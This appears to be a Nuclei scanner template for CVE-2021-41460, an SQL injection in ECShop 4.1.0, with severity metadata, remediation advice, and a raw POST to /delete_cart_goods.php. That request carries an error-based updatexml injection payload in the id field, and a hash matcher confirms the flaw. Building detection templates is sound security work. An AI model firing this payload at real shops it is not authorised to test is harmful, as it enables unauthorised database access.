id: CVE-2021-41460 info: name: ECShop 4.1.0 - SQL Injection author: SleepingBag945 severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823 - https://nvd.nist.gov/vuln/detail/CVE-2021-41460 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.00992 epss-percentile: 0.83223 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: shopex product: ecshop fofa-query: - product="ECShop" - product="ecshop" tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" http: - raw: - | POST /delete_cart_goods.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1)) matchers-condition: and matchers: - type: word part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' - type: status status: - 200 # digest: 4b0a00483046022100b397d96aeddbd254bb7ec713c50abafd8b5534e56bd672110d8f08b766957681022100c9f66e33f4fbe62da98961ede438d77ab8cd30c61f043f7a00b4fd31be2163f7:922c64590222798bb761d5b6d8e72950